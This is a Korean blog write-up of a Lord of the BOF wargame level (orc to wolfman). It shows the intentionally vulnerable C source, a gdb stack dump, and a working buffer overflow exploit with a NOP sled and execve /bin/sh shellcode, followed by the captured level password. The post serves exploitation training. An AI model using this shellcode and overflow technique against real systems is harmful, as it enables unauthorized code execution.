[LOB] orc -> wolfman

2019. 7. 28. 23:51Wargame & CTF/LOB

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
/*
        The Lord of the BOF : The Fellowship of the BOF
        - wolfman
        - egghunter + buffer hunter
*/
 
#include <stdio.h>
#include <stdlib.h>
 
extern char **environ;
 
main(int argc, char *argv[])
{
    char buffer[40];
    int i;
 
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
 
    // egghunter 
    for(i=0; environ[i]; i++)
        memset(environ[i], 0, strlen(environ[i]));
 
    if(argv[1][47!= '\xbf')
    {
        printf("stack is still your friend.\n");
        exit(0);
    }
    strcpy(buffer, argv[1]); 
    printf("%s\n", buffer);
 
        // buffer hunter
        memset(buffer, 040);
}
cs


맨 마지막에 buffer를 0으로 초기화한다. buffer안에 쉘코드를 못넣는다는 뜻이다.

goblin을 풀었던 것처럼 argv[2]에 쉘코드를 넣고 RET을 &argv[2]로 셋팅하면 될것이다.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
[orc@localhost tmp]$ ./wolfman `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'` `python -c 'print "\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿
Segmentation fault (core dumped)
[orc@localhost tmp]$ gdb -q wolfman core
Core was generated by `./wolfman AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿ '.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0xbfbfbfbf in ?? ()
(gdb) x/80x $esp
0xbffff6e0:    0x00000000    0xbffff724    0xbffff734    0x40013868
0xbffff6f0:    0x00000003    0x08048450    0x00000000    0x08048471
0xbffff700:    0x08048500    0x00000003    0xbffff724    0x08048390
0xbffff710:    0x0804861c    0x4000ae60    0xbffff71c    0x40013e90
0xbffff720:    0x00000003    0xbffff827    0xbffff831    0xbffff862
0xbffff730:    0x00000000    0xbffffc64    0xbffffc76    0xbffffc8e
0xbffff740:    0xbffffcad    0xbffffccf    0xbffffce1    0xbffffcea
0xbffff750:    0xbffffead    0xbffffecc    0xbffffee6    0xbffffefb
0xbffff760:    0xbfffff0c    0xbfffff17    0xbfffff30    0xbfffff3c
0xbffff770:    0xbfffff44    0xbfffff55    0xbfffff63    0xbfffff71
0xbffff780:    0xbfffff82    0xbfffff90    0xbfffff9b    0xbfffffaa
0xbffff790:    0xbfffffe6    0x00000000    0x00000003    0x08048034
0xbffff7a0:    0x00000004    0x00000020    0x00000005    0x00000006
0xbffff7b0:    0x00000006    0x00001000    0x00000007    0x40000000
0xbffff7c0:    0x00000008    0x00000000    0x00000009    0x08048450
0xbffff7d0:    0x0000000b    0x000001f8    0x0000000c    0x000001f8
0xbffff7e0:    0x0000000d    0x000001f8    0x0000000e    0x000001f8
0xbffff7f0:    0x00000010    0x0f8bfbff    0x0000000f    0xbffff822
0xbffff800:    0x00000000    0x00000000    0x00000000    0x00000000
0xbffff810:    0x00000000    0x00000000    0x00000000    0x00000000
(gdb) 
0xbffff820:    0x36690000    0x2e003638    0x6c6f772f    0x6e616d66
0xbffff830:    0x41414100    0x41414141    0x41414141    0x41414141
0xbffff840:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff850:    0x41414141    0x41414141    0x41414141    0xbfbfbf41
0xbffff860:    0x909000bf    0x90909090    0x90909090    0x90909090
0xbffff870:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff880:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff890:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff8a0:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff8b0:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff8c0:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff8d0:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff8e0:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff8f0:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff900:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff910:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff920:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff930:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff940:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff950:    0x90909090    0x90909090    0x90909090    0x90909090
cs


이번에도 nop sled를 이용할것이다.


1
2
3
4
5
[orc@localhost orc]$ ./wolfman `python -c 'print "A"*44+"\x01\xf9\xff\xbf"'` `python -c 'print "\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
bash$ my-pass
euid = 505
love eyuna
cs


wolfman : love eyuna

저작자표시 (새창열림)

'Wargame & CTF > LOB' 카테고리의 다른 글

[LOB] darkelf -> orge  (0) 2019.07.29
[LOB] wolfman -> darkelf  (0) 2019.07.28
[LOB] goblin -> orc  (0) 2019.07.28
[LOB] cobolt -> goblin  (0) 2019.07.28
[LOB] gremlin -> cobolt  (0) 2019.07.28

관련글

댓글 0

티스토리툴바